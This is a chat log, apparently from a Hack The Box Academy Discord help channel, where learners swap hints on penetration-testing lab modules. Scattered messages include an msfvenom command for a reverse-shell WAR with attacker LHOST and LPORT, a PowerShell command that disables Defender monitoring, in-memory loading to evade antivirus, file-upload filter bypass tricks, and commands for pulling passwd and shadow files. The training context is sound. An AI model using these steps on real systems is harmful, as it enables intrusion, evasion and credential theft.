#modules
Run a UDP scan in NMAP and review the SNMP section of the module
And the engagement briefing gives you a reason to look there
Hi guys, has anyone done Zephyr pro lab ?
There's a #prolabs-zephyr channel read #welcome on instructions on how to gain access to more of the server
Thanks
server is expecting a .gif but the data inside of the file is not a gif
maybe try swapping the extensions
looking for help on Attacking Common Applications - Attacking Tomcat, the Login Brute Force part. I tried with python and metasploit as shown in the module but am not able to get working credentials. What am I missing here?
you did not try what i said 🤷
ohh thanks u guys, it worked, idk i tried this on other sections and it worked, so i was stuck there, thanks sir
any time
That was a BRUTAL skill assessment but great
Does anyone have a second for DNS enumeration help
If you just ask your question, plus say the module and what youve done youll get a quicker response
ok gotcha, I haven't used this before sorry
Need help enumerating FQDN of IP x.x.x.203
used dig axfr internal.inalenfreight.htb @10.129.136.250 to get SOA's
@grizzled schooner you mean this question: Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer.
no, one second, and is there a reason that the syntax I just posted got erased?
only returned 1 answer which was a 127.0.0.1
Subdomain of a Subdomain
Hey. Has someone finished the malware analysis module and can help me with the skills part?
Well I'd tell you to git gud but your pfp beat me to it
Marcie, could you give me another nudge? I feel like I've tried everything and I am honestly just lost
Then you haven't tried everything
You're meant to use the bruteforce tool
dnsenum right?
Yes
trust me git gud is my wallpaper. I completed all the modules, I am just stuck on one question. I don't want the answer, just a tip for the right road
I've tried posting the syntax, but it just gets removed so it isn't much help lol
Probably bc spoiler
||can I use this to post the syntax then||
try ¯\_(ツ)_/¯
I've tried using ||dnsenum --dnsserver 10.129.136.250 --enum -p 0 -s 5 -o subdomains.txt -f /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt --threads 90 inlanefreight.htb and have subbed the wordlists as well||
Yeah but you're not looking at subdomains of subdomains
You're just looking at the main domain
The f* wordlist is the correct wordlist
i can find the domain in the apple.txt i tried static analysis and dynamic but i cant find anything. i foud all the rest
i cant find the domain *
Sirg I haven't done this module I was just poking fun
I have put for example ||ns.inlanefreight.htb root.inlanefreight.htb|| and none of them give me a response
There's more than those 2 on the main domain
don't they have to be SOA though?
No
🤣
oh okay, I thought they did, I will keep trying then, thanks
Module: File Upload Attacks
Section: Skills Assessment
Have bypassed everything and found a directory, but cannot find a magic byte, tried everything but cannot get the last thing
do anyone have a nudge?
SOA is just info on that domain zone
have run that ||dnsenum|| syntax and substituted ||x.inlinefreight.htb|| with all of the options that I was given, and nothing was returned due to ||NS record query failed||
Just wait, ns query will more often than not fail
Literally just be patient
Also inlanefreight, not inlinefreight
yeah sorry typed that out wrong, but it just returns me to run new syntax, it doesn't keep running
You shouldn't need to do anything with threads
I did change that and took that out when I ran the list of subdomains that I got, but I'm not getting anything
Your list of subdomains is probably wrong
I don't know how to upload a picture and add the spoiler, can I pm it to you
Do a manual zone transfer and see if the A records line up with your subdomains.txt more than likely you managed to omit the right one
Also for some reason you're doing -s 5?
I just checked @grizzled schooner the example they give you with the wordlist won't give you the full list of subdomains
I used this : ||ÿØÿî|| Also make sure you are uploading a real image and altering its data to a reverse shell payload. I mean don't upload a file that you renamed like this : ||mv shell.phar shell.phar.jpeg||
I mean ordering matters as well
.png.extension also bypasses as the server only sees the .png part and passes it
Yep
Good Afternoon, I'm having an issue with Windows Privilege Escalation - Windows Privileged users, any assistance would be useful
Nevermind .... it requires port specification
Just ask your question
for anyone who uses ligolo-ng for pivoting, how do you guys change the port for the initial connection 11601
Maybe this will help you
https://software-sinner.medium.com/how-to-tunnel-and-pivot-networks-using-ligolo-ng-cf828e59e740
On my journey to take on the OSCP I learned that pivoting/tunneling can be a confusing concept at first for beginners. After doing…
Guys
give me some help here:
question: Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer.
module: Nmap
So enumerate all the open ports and their services
I already did this
Tbh this one is a bit of a pain with your own vm, pwnbox gives the answer like 99% of the time
and nc all the open ports
Sometimes you need to reset the box a few times
and even use tcpdum
Did you do a full port scan?
tcpdump*
-p-
yes sir
I look at this with all my resources
and nothing happen
I found one port 31337
Sec
I look at and nothing too
Maybe try : ||-p31337 -A ||
How long did you wait?
nothing too
You said you found 31337 right?
You need to wait around 10-20 seconds after using netcat
Also, if you're doing tcpdump are you specifying tun0 as the interface?
yup
But yeah just gotta wait
letme try this
Zzz
got it
Patience is a key virtue in this field
Thank you @fathom pendant I would kiss you but you are so far away
on the face of course
Still don't
alright. I don't
That's double weird
lol why?
I'm kidding
Sorry, I didn't know that.
I understand that, I'm just not a fan of people being near my face
hey all need some help
i'm doing the intro to brute forcing
section login forms
but the page isn't loading
is the Target up and running?
yea it was a reset but i just started the dumb thing
So I'm doing the Windows File Transfer Module and I'm wondering something about this question:
"Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, RDP to the box, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer."
It seems to be asking that we upload the zip file to the target Windows machine before you RDP into the machine and if that's the case I'm a bit stuck. I easily got the question answered by RDP into the machine first then simply downloading the zip from my attack host, but now I'm wondering if I was supposed to somehow upload it to the target without being in control of the Windows machine. If that's what I was supposed to do, any tips on how to upload the file to the Windows target without first RDP into it?
I need help with question at the last of this section from the module "intro to bash scripting"
error reading input file
i get this error every time
are u try .phar in last extension ?
it double ext right ?
yes
do you try to swap ext ?
.phar.png should work for that one
sure !
Greetings everyone. I'm currently working on 'Intro to Assembly' assessment task 1. After decoding the shellcode on the stack, I found it contains many memory related operations where registers get dereferenced with default value 0, which leads to memory accesses to addresses close to 0 and therefore results in a segfault. I don't think manually mmap-ing a memory page at the lower addresses is a possible solution, as the mmap syscall will randomly allocate a memory chunk at a higher address if the provided address is 0. So, there might be a context or a special environment where the shellcode should execute. Any hints on this?
Did anyone go through "Introduction to Digital Forensics" and complete the Skills Assessment?
Did you have to download additional tools besides the ones that come with the machine???
What ? Dude once decode the Shellcode you just have to run it with the python loader and get the flag , if You are having segmentation issues maybe your decoding is not right.
Thanks for the reply. My current solution xors the 14 qwords one by one with the original key from rbx (like ECB), which yields the current shellcode. However, I also tried updating the key with the last decoded qword (like OFB), which yields a chunk of bad instructions. Probably I should try updating the key with the previous encoded qword (like CFB)
i'm stuck on value fuzzing. i can get the right ID# but my curl command only outputs i don't have access to that flag.
can anyone help me with that one?
Hey Goodnight Im having an issues with windows priv SeDebugPrivelege can someone assist me
Currently doing shells and payloads module > bind shell, trying to bind a bash shell in the server so i can connect from client, but im not able to use commands, all i can do is send messages. what am i doing wrong?
Often when I rdp to Windows hosts , I end up with this:
any neat trick to avoid this?
have tried different resolutions
It's just a screensaver, press enter
Your command isn't quite the same as shown in the "SeDebugPrivilege" section
Unfortunately, none of the above mentioned attempts work. I've replied to a forum post with details of my approach. I hope it would provide more information on why I got stuck ¯\_(ツ)_/¯
My approach is kinda similar to yours with the trust of the task statement that decodes the shellcode, by adding a loop to 'xor' each 8 bytes on the stack with the key in 'rbx'. global _start section .text _start: mov rax,0xa284ee5c7cde4bd7 push rax mov rax,0x935add110510849a push rax mov rax,0x10b29a9dab697500 push rax mov rax,0x200...
ON module AD / ACl Abuse tactics - I've been able to obtain the hash for said user. however when I try to crack it offline with hashcat I get ' no hash loaded'. Am I formatting the Hash file wrong?
nvm stupid question, seems like there was some line breaks added
Hello there! I've been struggling on the machine that I have to hack in the Getting Started module, where you have to use metasploit and exploitdb to find a way to break through a sample WordPress website. I did find the WordPress version, but I have no clue how to find the specific plugins used on the site in order to find a fitting exploit. Furthermore, while searching on exploitdb using searchsploit, I only found a few exploits associated with this version of WordPress, which were correlated with plugins which don't seem to be on this particular site. I also tried doing some page / directory enumeration using gobuster without much success... Can someone give me a tip on how I'm supposed to find the plugin that I will use to break through? Thanks in advance for your help
https://academy.hackthebox.com/module/144/section/1256
Managed to get question 1 and 2
But now the target is bugged even after I reset
I can't do 3
```
┌─[eu-academy-1]─[10.10.15.11]─[htb-ac-1018999@htb-ybrut9267e]─[~]
└──╼ [★]$ dig ns inlanefreight.htb @10.129.42.195

; <<>> DiG 9.18.12-1~bpo11+1-Debian <<>> ns inlanefreight.htb @10.129.42.195
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5763
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 2
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: ef5f3e49c6957c4201000000653b70557fbd4ce90b9be825 (good)
;; QUESTION SECTION:
;inlanefreight.htb.             IN      NS

;; ANSWER SECTION:
inlanefreight.htb.      604800  IN      NS      ns.inlanefreight.htb.

;; ADDITIONAL SECTION:
ns.inlanefreight.htb.   604800  IN      A       127.0.0.1

;; Query time: 6 msec
;; SERVER: 10.129.42.195#53(10.129.42.195) (UDP)
;; WHEN: Fri Oct 27 09:09:56 BST 2023
;; MSG SIZE  rcvd: 107

┌─[eu-academy-1]─[10.10.15.11]─[htb-ac-1018999@htb-ybrut9267e]─[~]
└──╼ [★]$ dig axfr ns.inlanefreight.htb @10.129.42.195

; <<>> DiG 9.18.12-1~bpo11+1-Debian <<>> axfr ns.inlanefreight.htb @10.129.42.195
;; global options: +cmd
; Transfer failed.
```
Your query is wrong
dig example.com @rustic sage-ip
You cannot have space between ns and inlanefreight.htb
anyone able to remind me of IMAPS syntax?
|| im doing footprinting hard and ive found the credentials for tom and im logged in the IMAPS service and can see the mailboxes and i wanna list all emails under important but i cannot do it ||
for 1 FETCH <ID> is the ID just the mailbox name?
up
This Question?
Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)
If so, take a look at the source code of the website. Then you will surely find a plugin which you can attack. Maybe use ||wpscan||
yes that's this question
i'll try again, thanks for the help
Why could all all be marked as error? It is the Burp Intruder chapter.
In the WINDOWS PRIVILEGE ESCALATION - Pillaging part, the exercise goes through a cookie editing part at slack.com. There's no internet access however, is this on purpose? It's specified to access slack through the spawned windows instance.
after using the tool you suggested, I found no plugin whatsoever, which leaves me on a dead end :/ I tried exploiting it via XML-RPC by trying the only exploit I could find on metasploit related to it, but it did not lead to anywhere... I really feel like I'm missing something obvious there, given that it's supposed to be one of the very first modules to do as a beginner. Any clue ? Thanks for your help btw
Think about how the site makes a backup
Don't get discouraged. You can do it 💪
Can someone who has finished the shell and payload module help?
I've spent hours trying to hack host1, but I can't find it.
For future questions about the topic, slack.com is not the target, rather slacktestapp.com. It differs from the walkthrough.
so it was indeed obvious ahahah, right under my nose! I found the exploit we're supposed to use on this machine and ended up with a big list of file addresses, but I don't get how I'm supposed to use this information since no matter how I write the url, it doesn't load anything. Am I supposed to connect to the site using ssh or with some GET http request?
(examples of such file/directory addresses)
With the right exploit in Metasploit, you can download a file (flag.txt)
Might I have to use another password cracking method to find will's password, or did I probably enter wrong information?
Which section are you on?
Section 1319
The name is more helpful
Passwd, Shadow & Opasswd
You did the credential hunting in linux section yes?
on the AD module / ACL. We go through both how to take over accounts and update their password as well as utilizing DCSync to dump hashes and tickets.
In a real life scenario would the ladder to be preferred?
Yes. So they ant me to use credentials from the last sectio
Latter* btw
*they want
Yes
This section has you reuse credentials you find
It's best to save them in a file
ok, the reason why I ask is that in the section after 'privileged access' you are asked to reset the password
Hey everyone, I'm stuck on the Live Engagement of the Shells and Payloads module. I've RDP'ed into the jump box and managed to complete the first few questions. The problem I have run into is the only browser I seem to have available is Links2. Links doesn't seem to be rendering most of the blog page, I can see a form in the html that isn't being rendered. Am I off in left field? Am I supposed to fix Links or did I miss a browser, or is there another path I'm not thinking of entirely?
which section is it?
the live engagement
type "firefox" in terminal
... well don't I feel dumb
?
oh, it worked. I can't believe I didn't try that
it's just that i had same issue when was doing that section
xd
well, thank you! I won't forget to try that again in the future, thats for sure lol
Module: RDP and SOCKS Tunneling with SocksOverRDP
Link: https://academy.hackthebox.com/module/158/section/1439
Problem:
I'm following the steps in the module per usual, however no matter which version of SocksOverRDPx64.zip I download, once I extract the files, the windows vm that I am RDP'd into as htb-student automatically deletes the .dll file needed.
I already checked the Windows Security settings and it is showing as disabled. Am I supposed to figure out how to bypass windows security without even doing a module related to that yet? Or is this an error.
Get-MpComputerStatus and check if the antivirus is enabled and running, if so you can stop it
Interesting it does show True. Is this normal?
why not?
go to security under settings and disable real-time protection
guess I didnt expect to have to do this early on in academy.
simple
windows security app shows its disabled, but Get-MpComputerStatus shows true
ohhhh
weird name, but Microsoft is built different
I see, thanks!
any time
Set-MpPreference -DisableRealtimeMonitoring $true if you want do it from PS
thanks
Hi everyone, I'm just doing the Active Directory Enumeration and Attack module. There is the Powershell module PowerView.ps1, but every time I download it my bitdefender detects it and then deletes it, so what is the purpose of this powershell module if any antivirus can detect and prevent it? How can it be used during the Penetration Testing process?
disable the AV
haha
i mean, you have command execution you can disable it
but also loading it in memory should work
with IEX
instead of downloading on drive
but what about permissions? in most cases compromised account dont have that permission
can you link any good tutorial? or detailed post about this?
in most cases you obfuscate tools like powerview or mimikatz, etc
it was mentioned in "File transfers" module
but here's the example
HTB academy explains it
if you're doing the path in order you should've learned this
and it's highly recommended to do it in order
probably lacking notes :S
(
probably
is it mentioned in AD enum & attack module?
no im just doing this module "Active Directory Enumeration & Attacks"
right
but are you just doing that module randomly? or are you doing it because you're on the pentesting job role path?
may I dm you?
yes
i just wanted to learn Active Directory and have better understanding
the problem is that the module expects a good understanding of a lot of things before you do it, file transfers, pivoting, enumeration, common services, etc.
someone gave you the answer above. if you truly want to learn, i'd recommend doing the File Transfers and Pivoting modules first
also it is stated in the module description
totally possible to have learned those things elsewhere of course
look into running script in memory, adding exclusion folders and disabling AV
thank you guys for answering
it's just a few commands in powershell, but they're important
I can't look at /etc/shadow because will doesn't have the permissions to look at the contents of that file. I switched to kira's user and tried looking at the contents of /etc/shadow and also was unable to. I tried editing the /etc/passwd contents by removing 'x' (since the module stated that if I removed 'x', I could go to root's directory without being prompted for a password) and I also had issues editing the content of /etc/passwd.
wrong approach
And why are there no boxes in "Status Code","Length" and "200 OK"?
wrong approach indeed, look very carefully what you have in will's home folder
enum is key as usual
Can someone who has finished the shell and payload module help?
ask your question
can't find a reverse shell suitable for hacking host01
lol, you already know which host that is
msfvenom I tried for 8 hours but no result.
big brain
what did you try?
I have tried almost all of apache tomcat and smb payloads, the result is that I cannot establish a connection
I need to add a reverse shell to the apache server with a java programming language, but after adding it, I listen to it and there is no result.
send your msfvenom command and what you're doing to catch the shell
is sharing notes a normal thing here? I'm just new and I don't know, sorry. If you can share notes I would be grateful, but if not, sorry for asking
I can't take a photo because I'm on the bus.
@rustic sage multi handler
people don't usually share their notes. everyone takes notes differently
did you trigger the shell?
@hallow kiln yes
i'm not going to help you if you can't read simple instructions...
send your msfvenom command and what you're doing to catch the shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.41 LPORT=80 -f war -o revshell.war
you run this, you upload it, you visit it
there is a start stop button also clicked
I mean there's no rule against it, but notes are too individual to be useful to anyone else
its not there
I don't even remember that button
@sly dome I've used this one, but it didn't work.
it definitely works
here
actually im experienced in playing CTFs, i just dont know some of details
please can anyone help with file uploads module whitelist filters section?
also be careful with LHOST and LPORT values
LHOST is your own IP
tun0 like Rafa said
what is your question?
your error is just wrong IP
whitelist filters, file uploads module
any time
i know, but be more specific
which step are you at?
@sly dome can i dm you?
I have run intruder with some upload file names, with the payload content being a php script to print hello world, but I keep getting File not found when I try to access it; one time I got Forbidden
yes
File not found = wrong path or didnt upload
Forbidden = you are trying to get into the wrong path
but in says it uploaded in burpsuite
probably wrong path
i sent a friend request
check the page source and you will see the path
accepted
Am I heading in the right direction at least ?
the name of the file is just ".jpg" which is strange bcuz that's not what I uploaded; also it didn't print hello world, but it's a blank page not throwing any errors
transfer those to your own machine
one way to do it is using base64, another is using simple HTTP server
yesterday I used 'scp' as a transfer method. Perhaps the 'scp' or the simple HTTP(with netcat?) will work
with wget in my opinion
nix01 has python3
from nix01: python3 -m http.server
from your host: wget <nix01's IP>:8000/passwd.bak
can also work
still stuck here
I thought getting a successful upload at all means both have been bypassed?
which extension?
this is the view source, the file name is just ".jpg" or ".png", it changes depending on what I upload
.jpg or .png is not gonna get interpreted as php by the server
||shell.php/.png|| is what I uploaded
1st you need a php extension that doesnt get blacklisted
thought we need character injection?
that does not work with modern php
1st try simple things
try upload .php -> you will get blacklist warning
try another php's extensions until you get the whitelist warning
from there try to bypass it
got the flag thanks so much man
any time bro
Hello,
just doing the Login Form Attacks question "Using what you learned in this section, try attacking the '/login.php' page to identify the password for the 'admin' user. Once you login, you should find a flag. Submit the flag as the answer.". I used Hydra and found ..... Every time another password.
Any idea?
Best regards
Christian
I think your Hydra Command is wrong.
But without details it is difficult to judge
have you made sure everything is set correctly, proper username and pass parameters, and very important - the fail condition
will begin again with this question, verify all again and come back later. Was just questioning why each time I run Hydra against the login.php page it gives me another password. Was thinking that if I have the wrong command it will not find anything,
it behaves weirdly when the command is incorrect, it could output that every password is correct for example
But it found me only one password each time, and each time a different one but with the same format (very similar) with some characters different. Will check my command all again
double-check everything, reset the target just to be sure, if it doesn't work, post your command and we can see what's up, then you can just delete once it's solved so it's not sitting as a full spoiler
the mode is just incorrect
I wouldn't use chatgpt for this
Guess you are right
there you go!
ha!
oh and another thing, use the mutated password list, I think I saw rockyou there
oh okay
Update: you were right there was a mistyping in my command. Worked good now
awesome!
hello!
i'm doing the Advanced SQL Injection Module, Task 1. I found the blind vulnerability in the ||/api/v1/check-user|| endpoint, and I'm exploiting it. I can extract the email value like ||admin@pass2.htb|| or usernames, but I cannot extract the password, because something is blocking extraction from the ||password|| column. Other columns like email, username work properly. Maybe I'm missing something((
hello
Detecting Windows Attacks with Splunk - I just enrolled on this, where can I access the splunk lab?
@hallow kiln hello again, I did what you said, I uploaded my payload file (shell.war) to tomcat in the same way but I can't get a back connection
I already found the lab.
all good
Found it . Now why doesn't rockyoulist work?
because the password's not in it
and you've set all the parameters in metasploit correctly?
@hallow kiln absurdly, after 10 minutes the connection came up. lol
@hallow kiln Thank you for your help. ❤️
glad it worked!
Hi All. Can someone help me with lateral movement in the "Attacking Enterprise Networks" module. I have followed the steps to escalate privileges to administrator. But I get the following error: C:\Windows\system32>þ
'þ' is not recognized as an internal or external command, operable program or batch file.
I have used the same command provided in the material of that section. Including the full path to net.exe produces the same error message. Trying to execute a command like "whoami" results in the same error message.
I need help understanding what is going on. Thanks.
Solved: Check the encoding of pwn.bat
In the module for Kerberos Attack - Kerberoasting from Linux (module/25/section/830) it asks to find Adam's password but when I use GetNPUsers.py I only get ||amber.smith jenna.smith carole.rose|| is there something wrong with the section?
GetNPUsers is AS-REP roasting, not Kerberoasting
yea but in the section it showed how to use GetNPUsers to list kerberoastable accounts
but the list i got didn't have adam
which is what the question is looking for
oh damn it
i made a big booboo
what an idiot
GetUserSPNs?
Ok so after more digging the only exploit I found on metasploit related to ||simple-backup|| (which I presume is the plugin that we're supposed to breach through) is the following: ||wp_simple_backup_file_read.rb||, which only gives me a full list of directory and user addresses like the ones I posted before. I tried looking for other exploits in other DBs such as exploitDB, which brought me the following link: ||https://www.exploit-db.com/exploits/39883||, but it seems that the exploit is not compatible with the version used on the box as none of its vulnerabilities worked, at least for me. In summary, I'm not gonna lie, I'm really getting frustrated about this one as I just cannot find a way to breach through it even though it's supposed to be introductory... Can someone pls confirm that I'm searching for exploits on the right plugin and if so, what is the name of the exploit I'm supposed to use, because I can't find more than one exploit on metasploit about this plugin. Thanks in advance for your help!
Hello guys, I am doing skills assessment 1 for the Windows Priv Esc module. The current user has the impersonate priv and I want to use juicy potato or print spoofer to get a revshell as system. However, I get errors with both. I suspect with juicypotato the problem could be the CLSID and I have been trying different values but it still doesn't work. Some CLSIDs initiate the connection but it's not a real shell aka I cannot issue commands. Anyone know about this problem?
just to give back some context, it's about the machine from this section : https://academy.hackthebox.com/module/77/section/843
On the AD Module I just completed the sections for Bleeding Edge Vulnerabilities and Miscellaneous Misconfigurations, a lot of useful stuff in these. Except for the boxes recommended at the end of the Module, is there a way to look up boxes where you could practice these exploits?
(Or if anyone has any recommendations)
Can somebody give me a hint at skills assessment - using web proxies, I'm at Q3
i don't understand how i can fuzz and encode the cookie in one step with burp
Ok i formatted exactly like explained this is the result
Hello Hello, I'm kinda new to all this stuff.
ATM I'm doing the footprinting module and I'm stuck at the MSSQL Server Login... with the user I already found to login via RDP, I can't log into the MSSQL Server
section?
can I see the first lines of "Sedebug.ps1"?
ok, mmm... I have used the second command shown with Get-Process anyway I'm going to quickly spawn the lab and see what's going on
E * Can potentially gather username structure from OSINT.
ok Thanks good looking out
What do you mean exactly? I'm at the end, there are 3 machines easy, medium and hard; I'm currently stuck at the Module Footprinting medium machine
Look around at the accessible files, there's an important document
could you please provide the exact command which you're using?
what a pain is the "pwnbox", anyway this is it:
Yes that is the correct thing i have the same
Hello, can someone help me with Intro to Assembly Language Skills Assessment? I'm having troubles in the second question...
and isn't working? Just give me another sec
Yeah I found it and I'm already logged in as priv user...
But this MSSQL is really shit ngl
Eh the GUI is all about clicking around and finding out
find a suspicious table
Yeah, but anyway thank you very much mister
right click and edit 200 entries
The footprinting section isn't really expecting you to know any sql commands
(Attacking common services later on goes over sql commands, for both mssql and mysql
hi I'm doing the ntlmrelay attacks section, ntlm relay over SMB attacks, and when i execute ntlmrelayx i receive the following error, does anyone know what's happening? thanks in advance
```
root@ubuntu:/home/htb-student/tools/impacketv11/impacket/examples# python3 ntlmrelayx.py
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in reflection mode
Traceback (most recent call last):
  File "ntlmrelayx.py", line 482, in <module>
    c = start_servers(options, threads)
  File "ntlmrelayx.py", line 189, in start_servers
    c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.dump_adcs, options.sid, options.add_dns_record)
TypeError: setLDAPOptions() takes 12 positional arguments but 13 were given
```
Yeah funny thing is, I think I would be more familiar with SQL in the CLI than this GUI stuff
I mean, you can do command line stuff, or use the "create new query" button in the gui
Mysql and mssql though have different commands
But how can I look into the tables itself? Via GUI I mean
Ok solved, directly using ntlmrelayx.py because it loads impacket v11 instead of 10
Right click the table and view
There is a commit made two days ago, now to run it would be:
PS C:\users\jordan> .\psgetsys.ps1; ImpersonateFromParentPid -ppid 5748 -command "c:\windows\system32\cmd.exe"
[+] Got Handle for ppid: 5748
[+] Updated proc attribute list
[+] Starting c:\windows\system32\cmd.exe ...True - pid: 4832 - Last error: 122
PS C:\users\jordan>
Can I dm u?
Sure
Ohhh wow
thank you will check it out
Found it. Thank you sir
Module:Password Attacks
Section:Password Reuse / Default Passwords
Tried every password for every use, also tried find a default creds for mysql but didnt find it in google, says that there is no default password and u need to set a password, could anyone help me pls?
There's a link given to you
github

It is in fact there I just checked
yeah i checked, u are right, sorry my bad
thanks guys
I also highly recommend saving any username:password combinations you get throughout this module
Module:Pivoting Section:SSH for Windows with plink.exe ---- has anyone tried this?
Yeah
@naive wadi did you get it working....
I figured it out
Because it's only expecting the ntlm part
Also remove the hash as it's still a spoiler
up
The file read is correct. Look at all the options again and think about what can be changed to give you the right answer
The file read exploit worked and gave you a specific file
But you can specify a different one
yeah, a txt file containing all those user~directory adresses that I don't quite understand yet
It's a specific linux file
thanks ALOT for the tip, I'll look for it tomorrow ^^
But that file isn't important AT all
If you keep trying to dig into it, you're just gonna hit a rabbit hole of nonsense
It's an intro module so it's gonna be simple
Module:Password Attacks
Section:Credential Hunting in Linux
Just have a question, do i need to bruteforce kira? bcs i have creds for sam user and im logged in...
Eventually
Actually no I think at this point you should already have her creds
Wait I'm dumb
Sorry it's been a minute
Sam doesn't have Will's creds :p
That's the point of this
And wills creds aren't in the password list AFAIK
oh ahaha, yeah i just checked everything and find nothing, thats bcs asked this
thanks for answer sir
There's a reason the hint tells you another user
do i need mutate "||LoveYou1",||(the hint) or just use mutated version of password.list?
That password is in the full list
but waiting 30 minutes is too much...
It doesn't necessarily take that long if you brute force a service like ftp or any other service than ssh
Brother; this section will test your patience a lot
Also using an appropriate amount of threads like -t 48 will speed it up
haha yes I realized this recently. a bit boring module
understood, thank you sir
The skills assessments do test you on EVERYTHING :) and when you get to one of them use the discord search feature as there's been plenty of links on it
Eh the most boring is the pivoting module because it's not so much skill as it is just following step-by-step
ohh ahah sounds scary, thanks for nudge
Yeah,just follow the steps.
I'll be honest the pictures are confusing. I just made my own diagrams
I just didn't know that I needed to complete 100% of the course to start the exam, so I made about 50 boxes on the HTB, and then when I tried to go to the exam I found out about it and have been finishing it for a week now...(PAIN!)
Yeah it explicitly tells you, but also you should be doing the modules to completion anyway as there's techniques that would have shown up on the exam and you'd have spent longer to learn it and apply it than to just know it for the exam

cat mutated | grep '^L'
grep -e
not needed
Sometimes grep doesn't play nice with regex
for start with or end with it works
I've had to add -e to a lot of my grep regex stuff with ^ or $
try it yourself
I have
me too

it works
I'd also prefer to just use -e as a habit
ofc
Hey I'm new to infosec type stuff here, the most I've done remotely relating to this is Android pentesting/rooting, web crawlers, and recently started helping with reversing iMessage (Pypush). Where do I start?
No it isnt and no you didnt because your name is still white
You need to verify your account to access the rest of the server including #general
Well I don't have an account yet
Then make one on https://app.hackthebox.com and do the thing
It takes at most 5 minutes
Right well, thanks I guess
Hi I am in the metasploit module meterpreter section I have done a scan and it reveals a smb, rdp and iis service I tried finding an exploit using the search option I tried using eternal blue and romance but they did not work the parameters I provided are in the snapshot. I would like to request some direction as I seem to be stuck.
any help please
you mean the auxiliaries right?
No I mean just running test or check
After setting options
Type check and hit enter
Reset target
@sterile epoch - I dont think that is the right payload
I just ran it and worked first try
you don't need to port scan
ok thanks for the hint
Password Attacks:
hello again guys huh, is there maybe issues with machine? copied via scp a files, did unshadow passwd.bak shadow.bak, and tried with paswordlist, mutated passwordlist and it cannot find a password, tried with rockyou.txt but it holds too long and my pc will fking explode i think, checked also a search feature in discord and didnt find anything useful, did someone know where is my bad?
Well since you're only tasked with getting root, take that password only
Instead of doing the whole list
it is on mutated one
if you are using hashcat
you cant use the unshadow format
i suggest you to check hashcat modes
Hashcat would have thrown an error
you have to remove some stuff from here @tame ivy
You're kinda spoiling that hash my guy
You have a really bad habit of doing that when you're trying to help
well it cracked, result:exhausted was for other users, stupid thing, why it didnt print a cracked users, and just typed exhausted, i checked the output "-o cracked.hashes" and there was a password...
its not an skill assessment i dont care actually
It's still a spoiler lol
exhausted is not cracked
As part of the task is getting it in the first place
Not crying lol, trying not to have you get thwacked by a mod
yeah i know, but in passwd and shadow thing was 4 users, i tried for 4 users instead for root only, and root was cracked, hashcat just didn't print it
sure they care
i've seen here A LOT of spoilers
not even removed or warned by a single mod
dont act plz
guys thanks for help, but please don't be angry at each other
we aren't
Seems like it's funny now
Spoilers are spoilers, if it's for a t0 module usually mods don't care as much as its fundamental
sorry can you please elaborate on the scan I tried
-sCV and U with Pn then -sn
You don't need to scan it is not the Nmap module
then how will I know what exploit to use
Could you please provide the nmap scan you performed
sorry my machine timed out and I did not save the results in my local machine but its not different from any fast scan
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5000/tcp open upnp
It's fine, okay, did you try the exploit with other payload?
I mean not the simple meterpreter, but with x64
No, wait
windows/x64/meterpreter/reverse_tcp
Did you try with this payload? Because sometimes the default payload doesn't work
What is the exact question you are stuck on?
I am still a little fuzzy with the payload encoding concept and I am stuck on both the questions in the meterpreter section
Also don't confuse people with strange advice like "don't use port scan"
Okay, could you please send the screenshot of options of your exploit?
here
What's the target there?
Also you're using there default payload "windows/meterpreter/reverse_tcp" not the "windows/x64/meterpreter/reverse_tcp"
automatic
Iirc there's x64 windows
this default one
In my case this one windows/x64/meterpreter/reverse_tcp worked completely fine
@supple patio
he is using it
Yeah, I see
I mean, it was the same, output in my case, but I configured the metasploit specifically for x64
It worked
is there a reason
Of course it's confusing
i have experience with metasploit
ohh
this part should have been easy
i want to do other modules first just that
Yeah, I even marked up that in my notes
dunno what I am doing wrong
I did a scan found out smb brain clicked to eternal blue cuz of ties to metasploit in prev modules and no other services are vul. I then filled the rhost and lhost. and ran it its giving error and the I checked the payload windows/x64/meterpreter/reverse_tcp
something wrong in the flow?
Okay, wait a while, i will check it up
thanks
there is one Microsoft IIS httpd 10.0 service running
yeah, run nmap with -sV -sC
you will see that http port with better response
I did
probably the exploit is in the service running in the web server
no, please access that http page
Yes i agree nothing popped
I will try it in the afternoon its 5am now spent the night on metasploit lab 2
but if you take a look at the web service with a browser you will see what is running
yeah, now i am still laughing at person who was writing here to not run any port scans
if you dont know if port 80 is open yea run it
I don't want to spoiler, there's something else)
kk
gl mate, just enumerate carefully
I tried the browser but nothing came maybe it was the old target i will give it another try today later
as i said i did not do the module, im just pointing out that IIS httpd 10.0 is not something to search for exploits generally
Thanks
i mean the ip:port would be better approach
I will update you once I do it
Thanks guys
yeah this isnt oscp, web server versions arent likely to be relevant
HAHAHAHA
Im completely serious
yeah
and i dont agree with that type of exam
but totally a super good cert to have
the 24h time limit is for sure difficult
and they hate automated tools
yes xD
w.e. most people need it to find a job
one cert i want from OffSec is OSEP, i find it very interesting
but off-topic
agree
OSWE also seems interesting
